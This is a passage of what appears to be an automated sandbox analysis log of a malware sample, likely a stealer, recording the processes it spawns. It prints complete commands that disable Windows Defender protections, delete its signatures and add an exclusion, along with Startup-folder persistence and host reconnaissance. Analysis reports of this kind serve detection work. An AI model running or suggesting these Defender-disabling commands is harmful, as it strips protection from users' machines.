              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60639ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60639ECE0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe" Jump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe" Jump to behavior
              Source: C:\Users\user\Desktop\Creal.exeProcess created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe" Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe" Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\Creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063B8DF0 cpuid 0_2_00007FF6063B8DF0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF60639DE44
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\certifi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info\license_files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info\license_files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
